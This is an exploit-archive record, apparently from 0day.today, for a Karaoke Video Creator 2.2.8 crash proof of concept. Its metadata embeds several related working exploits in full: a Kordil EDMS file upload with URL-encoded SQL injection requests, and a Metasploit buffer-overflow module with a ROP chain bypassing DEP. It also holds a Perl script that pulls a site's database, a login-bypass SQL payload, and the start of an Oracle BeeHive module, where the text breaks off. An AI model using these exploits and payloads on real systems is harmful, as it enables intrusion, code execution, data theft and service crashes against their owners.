ID 1337DAY-ID-13763 Type zdt Reporter PASSEWORD Modified 2010-08-20T00:00:00
Description
Proof-of-concept denial-of-service (crash) for the Windows platform, category dos / poc; no CVE is assigned and no code-execution claim is made.
=======================================
Karaoke Video Creator Denial of Service
=======================================
# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability
# Author: PASSEWORD
# Date: 2010-08-20
# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php
# Version : 2.2.8
# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers
# Tested on: Windows XP SP3 Fr
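# Generate the malformed .PK2 file used to crash Karaoke Video Creator 2.2.8.
#
# Fixes vs. the original PoC:
#  - it opened PASS.PK2 in append mode (">>"), so every run grew the file
#    beyond the 10000 bytes stated here and silently extended any existing
#    PASS.PK2; open for overwrite (">") instead;
#  - the open() was unchecked, so a failure produced no file and no message;
#  - a bareword filehandle is replaced by a lexical one under strict/warnings.
#
# Security caveat: a 10000-byte filler that only crashes the parser shows a
# DoS, not control of execution. No register/SEH state from the crash is given
# and no CVE or CVSS score is assigned, so treat this as crash-only until the
# fault is analysed.
use strict;
use warnings;

my $buff = "A" x 10000;    # 10000 bytes of 'A', no line breaks

open(my $fh, '>', 'PASS.PK2') or die "Cannot create PASS.PK2: $!";
binmode($fh);              # write the bytes unchanged (no newline translation)
print {$fh} $buff or die "Cannot write PASS.PK2: $!";
close($fh) or die "Cannot close PASS.PK2: $!";

# To reproduce, load PASS.PK2 in Karaoke Video Creator 2.2.8 on the tested
# platform (Windows XP SP3). The advisory gives no load steps; presumably the
# application's project/file open dialog is used -- confirm before relying on it.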
# 0day.today [2018-01-05] #
{"published": "2010-08-20T00:00:00", "id": "1337DAY-ID-13763", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T03:31:28", "bulletin": {"published": "2010-08-20T00:00:00", "id": "1337DAY-ID-13763", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.6, "modified": "2016-04-19T03:31:28"}}, "hash": "70853e0b5285a33ad73d4155b75a67ebf96b6016e01780e3b356015393858a0c", "description": "Exploit for windows platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-19T03:31:28", "edition": 1, "title": "Karaoke Video Creator Denial of Service", "href": "http://0day.today/exploit/description/13763", "modified": "2010-08-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13763", "references": [], "reporter": "PASSEWORD", "sourceData": "=======================================\r\nKaraoke Video Creator Denial of Service\r\n=======================================\r\n\r\n# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability\r\n# Author: PASSEWORD\r\n# Date: 2010-08-20\r\n# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php\r\n# Version : 2.2.8\r\n# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers\r\n# Tested on: Windows XP SP3 Fr\r\n \r\n$buff=\"A\" x 10000;\r\nopen (myfile , \">>PASS.PK2\");\r\nprint myfile $buff;\r\nclose (myfile);\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e6cd35bea631ebac8305f4a6985b28b2", "key": "sourceHref"}, {"hash": "7b15c3af60d44c5118dd1c7eb4179a1f", "key": "sourceData"}, {"hash": "058e04dde4ada0593b014d9fd2376fc0", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": 
"866042459d7d6bef5c46a6e536f70ac1", "key": "modified"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "published"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "d2a2cd0457b9f02e4a5cc3855908c0bd", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdd6a1c8624d2a3db2086a9c0d4855f0", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category dos / poc", "hash": "4f0596794256b2c340ffd2810ffa81b7a38a5bfa8dd75608a46114514356bf50", "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2018-01-05T21:16:30"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31643", "1337DAY-ID-21889", "1337DAY-ID-13761", "1337DAY-ID-13760", "1337DAY-ID-4436"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125195"]}, {"type": "exploitdb", "idList": ["EDB-ID:31643", "EDB-ID:13761", "EDB-ID:13763", "EDB-ID:13760"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/EASYCDDA_PLS_BOF"]}, {"type": "cve", "idList": ["CVE-2010-2343"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6455", "SECURITYVULNS:DOC:13763"]}], "modified": "2018-01-05T21:16:30"}, "vulnersScore": 5.5}, "type": "zdt", "lastseen": "2018-01-05T21:16:30", "edition": 2, "title": "Karaoke Video Creator Denial of Service", "href": "https://0day.today/exploit/description/13763", "modified": "2010-08-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/13763", "references": [], "reporter": "PASSEWORD", "sourceData": "=======================================\r\nKaraoke Video Creator Denial of Service\r\n=======================================\r\n\r\n# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability\r\n# Author: PASSEWORD\r\n# Date: 2010-08-20\r\n# Software Link: 
http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php\r\n# Version : 2.2.8\r\n# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers\r\n# Tested on: Windows XP SP3 Fr\r\n \r\n$buff=\"A\" x 10000;\r\nopen (myfile , \">>PASS.PK2\");\r\nprint myfile $buff;\r\nclose (myfile);\r\n\r\n\n\n# 0day.today [2018-01-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "4c10a308279666eece1d08b00f824a86", "key": "href"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "modified"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d2a2cd0457b9f02e4a5cc3855908c0bd", "key": "reporter"}, {"hash": "d9c5aa94b36b40b02a0a04189bb14af0", "key": "sourceData"}, {"hash": "02c658aed57f40a41959761d93070678", "key": "sourceHref"}, {"hash": "cdd6a1c8624d2a3db2086a9c0d4855f0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-11-19T19:11:21", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-11-16T00:00:00", "published": "2018-11-16T00:00:00", "id": "1337DAY-ID-31643", "href": "https://0day.today/exploit/description/31643", "title": "Kordil EDMS 2.2.60rc3 - Arbitrary File Upload Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Kordil EDMS 2.2.60rc3 - Arbitrary File Upload\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://www.kordil.net/\r\n# Software Link: https://vorboss.dl.sourceforge.net/project/kordiledms/Kordil%20EDMS%20v2.2.60rc3/kordil_edms_installer.exe\r\n# Version: 2.2.60rc3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# Users...\r\n# 1) \r\n# http://localhost/[PATH]/routine_emails_to_all_users_add.php\r\n# \r\nPOST /[PATH]/routine_emails_to_all_users_add.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=\r\n---------------------------114917121519378418451544589507\r\nContent-Length: 973\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd1\"\r\nadmin\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd2\"\r\nEfe\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd3\"\r\n2018-11-13 15:04:48\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"upload_fd4\"; filename=\"phpinfo.php\"\r\nContent-Type: 
application/force-download\r\n<?php\r\nphpinfo();\r\n?>\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd5\"\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"act\"\r\nn\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"QS_Submit\"\r\nAdd\r\n-----------------------------114917121519378418451544589507--\r\nHTTP/1.1 302 Found\r\nDate: Tue, 13 Nov 2018 12:15:22 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nLocation: ./routine_emails_to_all_users.php?\r\nContent-Length: 0\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n \r\nGET /PATH/email_attachment/admin-13.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/[PATH]/routine_emails_to_all_users.php?\r\nCookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:15:30 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/routine_emails_to_all_users_add.php\r\n# \r\n# http://localhost/[PATH]/email_attachment//[FILE]\r\n# \r\n<html>\r\n<body>\r\n<form name=\"qs_add_form\" method=\"post\" action=\"http://localhost/[PATH]/routine_emails_to_all_users_add.php\" 
enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"add_fd1\" value=\"admin\">\r\n<input type=\"text\" name=\"add_fd2\" value=\"Efe\">\r\n<input type=\"hidden\" name=\"add_fd3\" value=\" 2018-11-13 15:04:48\">\r\n<input type=\"file\" name=\"upload_fd4\" id=\"File\">\r\n<input type=\"text\" name=\"add_fd5\" value=\"\" hidden=\"true\">\r\n<input type=\"hidden\" name=\"act\" value=\"n\">\r\n<input type=\"submit\" name=\"QS_Submit\" value=\"Add\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]\r\n#\r\nGET /PATH/users_edit.php?currentrow_fd0=%2d%31%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:21:09 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n# POC: \r\n# 4)\r\n# 
http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]\r\n#\r\nGET /PATH/personal_notebook_category_edit.php?currentrow_fd0=%2d%31%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:22:49 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=97\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\n\n# 0day.today [2018-11-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31643"}, {"lastseen": "2018-02-10T11:36:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "1337DAY-ID-21889", "href": "https://0day.today/exploit/description/21889", "type": "zdt", "title": "Easy CD-DA Recorder PLS Buffer Overflow Exploit", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack-based 
buffer overflow vulnerability in\r\n Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.\r\n By persuading the victim to open a specially-crafted .PLS file, a\r\n remote attacker could execute arbitrary code on the system or cause\r\n the application to crash. This module has been tested successfully on\r\n Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'chap0', # Vulnerability discovery and original exploit\r\n 'Gabor Seljan', # Metasploit module\r\n 'juan vazquez' # Improved reliability\r\n ],\r\n 'References' =>\r\n [\r\n [ 'BID', '40631' ],\r\n [ 'EDB', '13761' ],\r\n [ 'OSVDB', '65256' ],\r\n [ 'CVE', '2010-2343' ],\r\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x0a\\x3d\",\r\n 'Space' => 2454,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\r\n # easycdda.exe 3.0.114.0\r\n # audconv.dll 7.0.815.0\r\n {\r\n 'Offset' => 1108,\r\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 7 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\r\n ],\r\n self.class)\r\n \r\n end\r\n \r\n def nops\r\n return make_nops(4).unpack(\"V\").first\r\n end\r\n \r\n def rop_nops(n = 1)\r\n # RETN (ROP NOP) [audconv.dll]\r\n [0x1003d55d].pack('V') * n\r\n end\r\n \r\n def exploit\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n rop_gadgets =\r\n [\r\n 0x1007261e, # POP EDX # RETN [audconv.dll]\r\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\r\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\r\n 0x10035802, 
# XCHG EAX,ESI # RETN [audconv.dll]\r\n 0x1005d288, # POP EBP # RETN [audconv.dll]\r\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\r\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\r\n 0x00000996, # 0x00000996-> EBX\r\n 0x1008740c, # POP EDX # RETN [audconv.dll]\r\n 0x00000040, # 0x00000040-> EDX\r\n 0x1001826d, # POP ECX # RETN [audconv.dll]\r\n 0x004364c6, # &Writable location [easycdda.exe]\r\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\r\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\r\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\r\n nops,\r\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\r\n ].flatten.pack('V*')\r\n \r\n sploit = rop_nops(target['Offset'] / 4)\r\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\r\n sploit << [target.ret].pack(\"V\")\r\n sploit << rop_nops(22)\r\n sploit << rop_gadgets\r\n sploit << payload.encoded\r\n sploit << rand_text_alpha_upper(10000) # Generate exception\r\n \r\n # Create the file\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(sploit)\r\n \r\n end\r\nend\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21889"}, {"lastseen": "2018-02-06T07:06:20", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-19T00:00:00", "published": "2010-08-19T00:00:00", "id": "1337DAY-ID-13761", "href": "https://0day.today/exploit/description/13761", "type": "zdt", "title": "Anasayfam Portal 2010 Remote Database Disclosure Exploit", "sourceData": "========================================================\r\nAnasayfam Portal 2010 Remote Database Disclosure Exploit\r\n========================================================\r\n\r\n#!/usr/bin/perl -w\r\n#\r\n# Anasayfam Portal 2010 / Database Disclosure Exploit\r\n#\r\n# Coded: BARCOD3\r\n# \r\n#\r\n#\r\n#\r\n# Thanks: DaiMon, 
KnocKout, NeT-Excellans all Logystics.\r\n#\r\n \r\n \r\n \r\nuse LWP::Simple;\r\nuse LWP::UserAgent;\r\n\r\nsystem('cls');\r\nsystem('title Anasayfam Portal 2010 Remote Database Disclosure Exploit');\r\nsystem('color 4');\r\n\r\n\r\nif(@ARGV < 2)\r\n{\r\nprint \"[-]Example Exp.\\n\\n\";\r\n&help; exit();\r\n}\r\nsub help()\r\n{\r\nprint \"[+] usage1 : perl $0 site.com /path/ \\n\";\r\nprint \"[+] usage2 : perl $0 localhost / \\n\";\r\n}\r\n\r\nprint \"\\n************************************************************************\\n\";\r\nprint \"\\* Anasayfam 2010 Remote Database Disclosure Exploit *\\n\";\r\nprint \"\\* auth0r : BARCOD3 *\\n\";\r\nprint \"\\* contact : ozk4nbozkurt[at]hotmail[dot]com *\\n\";\r\nprint \"\\* Special thx. DaiMon, KnocKout, NeT-Excellans all Logystics. *\\n\";\r\nprint \"\\*********************************************************************\\n\\n\\n\";\r\n\r\n($TargetIP, $path, $File,) = @ARGV;\r\n\r\n$File=\"db/anasayfam.mdb\";\r\nmy $url = \"http://\" . $TargetIP . $path . $File;\r\nprint \"\\n wait!!! \\n\\n\";\r\n\r\nmy $useragent = LWP::UserAgent->new();\r\nmy $request = $useragent->get($url,\":content_file\" => \"C:/anasayfam.mdb\");\r\n\r\nif ($request->is_success)\r\n{\r\nprint \"[+] $url Exploited!\\n\\n\";\r\nprint \"[+] Database saved to C:/anasayfam.mdb\\n\";\r\nexit();\r\n}\r\nelse\r\n{\r\nprint \"[!] Dur la dur sakin ol $url olmadi bu !\\n[!] 
\".$request->status_line.\"\\n\";\r\nexit();\r\n}\r\n\r\n\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13761"}, {"lastseen": "2018-01-02T05:14:52", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-19T00:00:00", "published": "2010-08-19T00:00:00", "id": "1337DAY-ID-13760", "href": "https://0day.today/exploit/description/13760", "type": "zdt", "title": "clipbucket 2.0.8.366 By Pass Vulnerability", "sourceData": "==========================================\r\nclipbucket 2.0.8.366 By Pass Vulnerability\r\n==========================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ####################################### 1\r\n0 I'm indoushka member from Inj3ct0r Team 1\r\n1 ####################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n######################################################################## \r\n\r\n# Vendor: www.Clip-Bucket.com\r\n\r\n# Date: 2010-05-27 \r\n\r\n# Author : indoushka \r\n\r\n# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 
\r\n\r\n# Contact : 00213771818860\r\n\r\n# Home : www.sec4ever.net\r\n\r\n# Bug : By Pass\r\n\r\n# Tested on : windows SP2 Francais V.(Pnx2 2.0) \r\n######################################################################## \r\n \r\n# Exploit By indoushka \r\n\r\n1 - http://127.0.0.1/clip/admin_area/styles/cbv2/layout/\r\n\r\n_permission.html\r\nadd_group.html\r\nadd_members.html\r\nadd_phrase.html\r\nads_add_placements.html\r\nads_manager.html\r\nedit_group.html\r\neditor_pick.html\r\nflagged_groups.html\r\nflagged_users.html\r\nflagged_videos.html\r\ngroup_category.html\r\ngroups_manager.html\r\nheader.html\r\nleft_menu.html\r\nlogin.html\r\nmass_uploader.html\r\nmembers.html\r\nmsg.html\r\nplugin_manager.html\r\nreports.html\r\ntemplate_editor.html\r\ntemplates.html\r\nunder_development.html\r\nuser_category.html\r\nuser_levels.html\r\nview_conversion_log.html\r\nbody.html\r\nfooter.html\r\nmanage_pages.html\r\nedit_announcemnent.html\r\ncomments.html\r\nmass_email.html\r\ncb_mod_check.html\r\ncb_conversion_queue.html\r\nmanage_players.html\r\nindex.html\r\nview_user.html\r\nglobal_header.html\r\nreindex_cb.html\r\nlanguage_settings.html\r\nmain.html\r\nemail_settings.html\r\nvideo_manager.html\r\ncategory.html\r\nupload_thumbs.html\r\nview_video.html\r\nedit_video.html\r\n\r\nDz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================\r\nspecial thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller \r\nSid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net \r\nMR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te \r\n---------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": 
"https://0day.today/exploit/13760"}, {"lastseen": "2018-03-28T07:14:53", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-12-14T00:00:00", "published": "2008-12-14T00:00:00", "id": "1337DAY-ID-4436", "href": "https://0day.today/exploit/description/4436", "type": "zdt", "title": "FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability ", "sourceData": "=================================================================\r\nFlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability \r\n=================================================================\r\n\r\n\r\n[START]\r\n\r\n#########################################################################################\r\n[0x01] Informations:\r\n\r\nScript : FlexPHPNews PRO 0.0.6\r\nScript\t : FlexPHPNews 0.0.6\r\nDownload : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro]\r\nDownload : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6]\r\nVulnerability : Sql Injection (Auth bypass)\r\nAuthor : Osirys\r\nNotes : Proud to be Italian\r\nGreets: : XaDoS, x0r, emgent, Jay\r\n\r\n#########################################################################################\r\n[0x02] Bug:[Sql Injection (Auth bypass)]\r\n######\r\n\r\nBugged file is: /[path]/admin/usercheck.php\r\n\r\n[CODE]\r\n\r\nif (!empty($logincheck)){\r\n$sql = \"select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'\";\r\n$results = $db->select($sql);\r\n\r\n[/CODE]\r\n\r\n\r\n[!] 
EXPLOIT DETAILS:\r\n\r\n [1] Go to /[path]/admin/index.php\r\n [2] Put as username and password the following sql code: ' or '1=1\r\n [3] You are the admin now, bypass succesfull =)\r\n\r\n#########################################################################################\r\n\r\n[/END]\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4436"}], "metasploit": [{"lastseen": "2019-11-27T05:07:21", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM.\n", "modified": "2017-07-24T13:26:21", "published": "2015-11-25T01:17:57", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE_BEEHIVE_EVALUATION", "href": "", "type": "metasploit", "title": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n 